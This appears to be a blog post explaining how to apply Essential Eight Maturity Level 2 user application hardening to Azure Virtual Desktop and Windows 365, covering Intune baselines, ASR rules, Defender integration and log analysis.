Implementing Essential 8 Maturity Level 2 in Microsoft Cloud VDI (AVD & W365)

We’ve all had that one poorly made coffee that somehow ruins your morning flow — bitter, messy, and impossible to fix once poured. In many ways, unprotected applications in a virtual desktop are the same. A single dodgy browser plugin or outdated PDF reader can completely spoil your security blend. That’s where User Application Hardening comes in. It keeps the bad add-ins and malicious macros from spilling into your users’ sessions.

What is User Application Hardening?

User Application Hardening is one of the Australian Cyber Security Centre (ACSC) Essential Eight strategies. At Maturity Level 2 (ML2), it’s all about reducing exposure in user-facing applications — browsers, Office apps, PDF readers, and similar — by removing or disabling risky capabilities.

In plain terms, it means:

Removing Internet Explorer 11
Disabling Java, Flash, and other deprecated script engines
Blocking Office from running macros, injecting code, or launching child processes
Hardening PDF readers to prevent malicious scripts

These changes collectively close high-frequency exploitation routes that adversaries love to abuse.

How it Works in Cloud VDI

For both Azure Virtual Desktop (AVD) and Windows 365 Cloud PCs, these controls are applied through centralised management and policy enforcement. The approach differs slightly depending on how compute sessions are delivered.

Azure Virtual Desktop (AVD):
Multi-session environments typically use a golden image that includes hardened apps and preconfigured baselines. Configuration policies are applied using Microsoft Intune, Group Policy Objects (GPOs), and Defender for Endpoint integration via the session host templates.
Windows 365:
Each Cloud PC runs as a dedicated instance for a single user. Intune device policies and security baselines map directly to each machine, which simplifies lifecycle management.

Policy Flow Diagram

flowchart LR A[Intune & Defender Policies] --> B{Policy Delivery} B --> C[Azure Virtual Desktop Session Hosts] B --> D[Windows 365 Cloud PCs] C --> E["Applications Hardened (Edge, Office, Acrobat Reader)"] D --> E E --> F["Telemetry sent to Defender / SIEM"] F --> G[Security Operations Centre for Analysis]

This unified approach enforces restriction policies across the environment and provides telemetry for continuous oversight through Defender and log integrations.

Real-World Impact

Attackers exploit what users trust most — browsers, email attachments, spreadsheets, and documents. Once embedded in a malicious payload, even an Office macro can deliver PowerShell commands or dropper scripts within seconds.

User Application Hardening directly trims these attack surfaces. When paired with logging and timely analysis, it creates a resilient, self-defending virtual desktop environment that meets both ACSC ML2 obligations and enterprise expectations for modern security operations.

The business outcome: fewer incidents, faster detection, and a far more predictable user experience.

Implementation Example

Intune

You can deliver application hardening through a single, unified Intune policy that implements all required ML2 browser, Office, and PDF settings.

Step 1 – Create a consolidated configuration profile

In the Microsoft Intune admin centre, go to Endpoint Security → Security Baselines → Microsoft Edge baseline.
Select Create Profile and assign a clear name such as Essential8-UserApplicationHardening-ML2.

Apply the following browser protection settings derived from both ASD and Microsoft guidance:

Category	Setting	Recommended Value
SmartScreen	Require SmartScreen for URLs	Enabled
Plugins	Allow Adobe Flash and Java	Disabled
Tracking Prevention	Apply Strict Mode	Enabled
Extensions	Block unapproved extensions	Enabled
Security Updates	Disallow user override of update policy	Enabled
IE Mode	Disable IE Integration	Enabled
JavaScript	Allow only signed scripts from trusted zones	Enabled
Site Security	Prevent site isolation overrides	Enabled

Assign the profile to both AVD session host and Windows 365 device groups.

This single policy ensures browsers are protected against common vectors such as Java-based web content, Flash exploits, and malicious ads or extensions.

Step 2 – Office and PDF Hardening

Add the Microsoft 365 Apps Baseline to disable macro execution from the Internet and restrict add-ins to trusted publishers.
Enforce ASR rules to block child process creation, executable content, and code injection:
- D4F940AB-401B-4EFC-AADC-AD5F3C50688A (Child Processes)
- 3B576869-A4EC-4529-8536-B80A7769E899 (Executable Content)
- 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 (Code Injection)
Deploy a custom configuration profile for PDF readers disabling JavaScript (bDisableJS=1) and network features.

Step 3 – Defender for Endpoint Integration

Integrate hardening with Defender for Endpoint to manage and enforce ASR rules automatically:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


resource avdVmExtension 'Microsoft.Compute/virtualMachines/extensions@2022-11-01' = {
  name: 'AVD-Defender-Policy'
  parent: avdSessionHost
  properties: {
    publisher: 'Microsoft.Azure.Security'
    type: 'MDE.Windows'
    typeHandlerVersion: '1.0'
    autoUpgradeMinorVersion: true
  }
}

Logging, Monitoring, and Timely Analysis

ML2 goes beyond configuration — it demands that logs are collected, retained, and analysed in a timely manner to detect and respond to threats.

That means enabling and centralising:

Command-line process creation events (Event ID 4688)
PowerShell script and block logging (Events 4103 and 4104)
Defender for Endpoint telemetry
Application event logs for Office, Edge, and Acrobat

Logs should funnel into a single collection point for active analysis — not passive storage. This is where a Security Operations Centre (SOC) capability becomes essential.

If you already operate an in-house SOC, integrate AVD and Windows 365 telemetry into your existing monitoring workflows through Microsoft Sentinel.

If you don’t, consider:

Huntress SIEM – a streamlined, cloud-based offering ideal for smaller environments looking to meet ML2 logging analysis obligations, or
A Managed Sentinel deployment delivered through a Microsoft partner providing continuous SOC monitoring, threat correlation, and response capability.

The ACSC expectation is that indicators of compromise are identified and acted on quickly — it’s not compliance until there’s detection with action behind it.

Gotchas & Edge Cases

Dual Configuration Sources: Avoid policy conflicts between Intune and GPO; choose a single management authority.
Macro-Dependent Workflows: Use digitally signed macros or trusted locations instead of disabling macros entirely.
PDF Vendor Support: Ensure your preferred PDF tool supports configuration at policy level.
SOC Gaps: Logging without analysis breaches ML2 intent. Every control should have someone — or something — watching logs for anomalies.

Best Practices

Use Microsoft Security Baselines as a foundation and overlay ACSC guidance.
Harden images upstream for AVD; redeploy session hosts from a clean, compliant golden image.
Link to Defender for Endpoint early to capture telemetry.
Enable SIEM integration from day one to meet the “timely analysis” requirement.
Automate validation using PowerShell scripts and Azure Policy compliance checks.
Document deviations and review them quarterly to retain ML2 alignment.

🍺

Brewed Insight: Like brewing a double-shot, this control is all about pressure and precision. Tighten policies too hard and workflow suffers; too loose, and your security posture leaks. The right blend of Intune policies, Defender enforcement, and SOC visibility keeps your digital espresso crisp and strong every time.